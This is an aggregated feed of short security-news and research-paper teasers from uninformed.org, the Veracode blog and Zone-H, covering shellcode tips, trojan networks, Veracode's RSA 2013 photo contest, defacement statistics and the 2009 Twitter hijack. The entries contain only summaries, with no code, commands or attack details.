==> Smart Parking Meters

http://www.uninformed.org/uninformed.rss Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper ...

==> Loop Detection

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and ...

==> Social Zombies: Aspects of Trojan Networks

http://www.uninformed.org/uninformed.rss Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft ...

==> Mac OS X PPC Shellcode Tricks

http://www.uninformed.org/uninformed.rss Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction ...

==> Annoyances Caused by Unsafe Assumptions

http://www.uninformed.org/uninformed.rss This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases ...

==> Final Two Winners of Our #NoSOUP Photo Contest

http://www.veracode.com/blog/?feed=rss2 With RSA all rounded up, the only thing left for us is to announce the final two winners of our #NoSOUP photo contest and get their prizes out to them. Our photo booth with Larry Thomas of Seinfeld was a great success, with over 1,000 photos taken with him over the course of the week! Nearly 100 of you decided to participate in our #NoSOUP contest through either Twitter, Facebook or emailing us your photos (you can see the full list of email entries on our official #NoSOUP contest page).

==> At The Vulnerability Oscars, The Winner Is….Buffer Overflow!!

http://www.veracode.com/blog/?feed=rss2 Analysis of 25 years of CVSS vulnerability data from the firm Sourcefire finds that buffer overflows are the most common - and the most commonly meddlesome - problem in the software world. Why?

==> The First Two Winners in Our #NoSOUP Photo Contest

http://www.veracode.com/blog/?feed=rss2 As you may have noticed, our team has been out in San Francisco this week enjoying and working the RSA Conference. Larry Thomas from Seinfeld, "the S.O.U.P. Nazi", has made a big splash and folks have been lining up by the hundreds to get their photos taken with him. We thought this might be the case, which is why we built our contest around Larry and made it as simple as sharing your photo with him.

==> #NoSoup For You Photo Contest

http://www.veracode.com/blog/?feed=rss2 You've probably already heard that our RSA Booth #1342 will be featuring a photo op with Larry Thomas from Seinfeld. Fans of the show will undoubtedly remember his immensely popular character the Soup Nazi, as he was one of the few, perhaps the only, guest characters to steal the show from its mainstays. But why did we commission him to join us? Simple. We're out to eliminate S.O.U.P., no not the chicken noodle sort but rather Software of Unknown Pedigree!

==> Veracode at RSA Conference USA 2013

http://www.veracode.com/blog/?feed=rss2 With RSA Conference kicking off Monday, the offices here are abuzz with activity. In addition to our Booth (#1342) we will also have a few other notable attractions for attendees. Between Conference Sessions, our 'Wicked Smaaht' Security Talks, a photo booth featuring Larry Thomas from Seinfeld and an iOS app available for download, there's something for everyone this year!

==> Cybercriminal Eye On The Developer Guy: Hacking Facebook, Twitter and Apple

http://www.veracode.com/blog/?feed=rss2 There are lots of interesting conclusions to be drawn from the recent targeted hacks of Facebook, Twitter and Apple. Chief among them: application developers are on the list of targets for sophisticated cyber criminal groups.

==> A Look Back on the Future of Tomorrow

http://www.veracode.com/blog/?feed=rss2 Like many of my industry peers, my first job was in the telecom industry developing software. Back in the day, we used telnet to remotely log in to the workstation of our choice and then go on about our day writing code and sipping coffee. Software security was not part of our vocabulary or our corporate culture.

==> Zombie Apocalypse? Blame The User!

http://www.veracode.com/blog/?feed=rss2 No, the dead aren't rising from their graves to attack the living. But that doesn't mean that there's not plenty of blame to go around in the recent hack of the U.S.'s Emergency Alerting Service (EAS).

==> How We Made Social Sharing “Smarter”

http://www.veracode.com/blog/?feed=rss2 For the curious developers or security folk following us, we wanted to share the methodology behind our latest tool, Smart Social Sharing. The State of Social Sharing: Commercial sharing tools provide simple and fast social sharing of web content. Tools like AddThis, ShareThis, and other CMS plugins that enable social sharing are ubiquitous.

==> Why We Made SmartShare: A Safer Social Sharing Plugin

http://www.veracode.com/blog/?feed=rss2 Veracode's mission is to secure the software that runs the world. Our marketing department is no exception. When we recently looked at the security posture of the veracode.com website, we found we were using too many untrusted third-party widgets that put site visitors at risk and could even potentially be used to deface our website. Instead of removing this functionality from the website or staying with the risky status quo, we took it upon ourselves to build a safer alternative.

==> Hacker diagnosed with brain cancer, hacks the closed source report distributing it to the open source community hoping to get some help

http://www.zone-h.org/rss/news This is somewhat astonishing news, and once again a demonstration that alternative thinking might be the way to solve apparently unsolvable cases. I just report what was written by the hacker himself on his website. Can anyone help? Rome, September 10th, 2012. I have brain cancer. Yesterday I went to get my digital medical records: I have to show them to many doctors. Sadly they were in a closed, proprietary format and, thus, I could not open them using my computer, or send them in this format to all the people who could have saved my life.

==> Zone-H celebrates its 10 years!

http://www.zone-h.org/rss/news 10 years ago Zone-H opened, a little website with security news and a "cybercrime archive" which quickly became a success story. The goals of Zone-H were to follow security trends and analyze the growing importance of hacktivism.

==> Turkish hacking group defaces UPS, TheRegister, Acer, Telegraph, Vodafone

http://www.zone-h.org/rss/news At the time of writing these websites are still defaced, with a black page reading "TurkguvenLigi" and "4 Sept. We TurkGuvenligi declare this day as World Hackers Day - Have fun ;) h4ck y0u". What do ups.com, vodafone.com, theregister.co.uk, acer.com, betfair.com, nationalgeographic.com and telegraph.co.uk have in common? They all use NetNames as their registrar.

==> Zone-H banned by some Indian ISPs: some workarounds

http://www.zone-h.org/rss/news As some of you probably know, Zone-H has been banned from some Indian ISPs following the E2-labs scandals and a lawsuit from E2labs and Zaki Qureshey in an Indian court, who claimed our documents and articles were defamatory (great joke!). Zone-H was unable to defend itself as we didn't receive any notification from the court. What is even funnier (scarier?) is that bloggernews.net has also been banned...

==> New attack vector in DDoS observed

http://www.zone-h.org/rss/news This article is the result of joint research by Jakub Alimov from Seznam.cz and minor from Zone-h.org. If you have anything to say about this, write to comments [a} zone-h{dot]org. The topic was presented at the SPI conference in Brno/CZ. While protecting users from receiving huge volumes of unsolicited bulk mail, a new attack scenario against DNS servers was observed. The scenario involves sending spam messages to SMTP services with high bandwidth.

==> The old "new" Japanese scams

http://www.zone-h.org/rss/news Dear friends, in these days we have all turned our minds to Japan and to the Japanese people; some of them are our friends, and some of our friends live in Japan. We would like to express our condolences to the families who lost their family members. We are deeply concerned about the injuries and losses caused by the series of earthquakes, the tsunami flooding and the nuclear catastrophe. Nevertheless, we also have to express our anger. We have already recorded the first set of scam emails asking unaware users to donate to charity, but as usual the money will never reach the victims.

==> Defacements Statistics 2010: Almost 1.5 million websites defaced, what's happening?

http://www.zone-h.org/rss/news Last year Zone-H archived a sad record number: 1,419,203 website defacements. Why and how is this happening? If you look at the stats, things remain the same: file inclusion, SQL injection, WebDAV attacks and share misconfiguration are still the top-ranked attack methods used by defacers to gain initial access to the server. An important factor influencing the stats, in our view, is that last year brought a very high number of local Linux kernel exploits.

==> Notes on the Wikileaks case

http://www.zone-h.org/rss/news First of all, we would like to emphasize that Zone-H is not related to any party in the Wikileaks case. We neither agree nor disagree with any action that has happened; we just want to share our opinion on the forthcoming events. Many news media have already released information about the cables, sources, how it happened etc. But now it is clear that Wikileaks will not stop publishing the cables. There are plenty of mirrors all around the globe and the information is shared over Facebook and Twitter. Even the arrest of Julian Assange can't stop the day-by-day publishing of the cables.

==> Defacements Statistics 2008 - 2009 - 2010*

http://www.zone-h.org/rss/news When Zone-H started back in 2002, we were receiving an average of 2,500 defacements monthly; this number keeps increasing year after year. For example, last month we registered over 95,000 defacements, while we had only 60,000 in 2009 for the same period. What we can also say from these numbers is that the methods used are still the same: most of the vulnerabilities exploited are in web applications. We also know from what we monitored that registrar attacks greatly increased in the past years, even if this number is quite low compared to the total of attacks.

==> Twitter and Baidu hijacked by "Iranian Cyber Army"

http://www.zone-h.org/rss/news You probably read that story somewhere last month: on December 17, 2009, Twitter's homepage was replaced by this message: "Iranian Cyber Army THIS SITE HAS BEEN HACKED BY IRANIAN CYBER ARMY iRANiAN.CYBER.ARMY@GMAIL.COM U.S.A. Think They Controlling And Managing Internet By Their Access, But THey Don't, We Control And Manage Internet By Our Power, So Do Not Try To Stimulation Iranian Peoples To…. NOW WHICH COUNTRY IN EMBARGO LIST? IRAN? USA? WE PUSH THEM IN EMBARGO LIST ;) Take Care.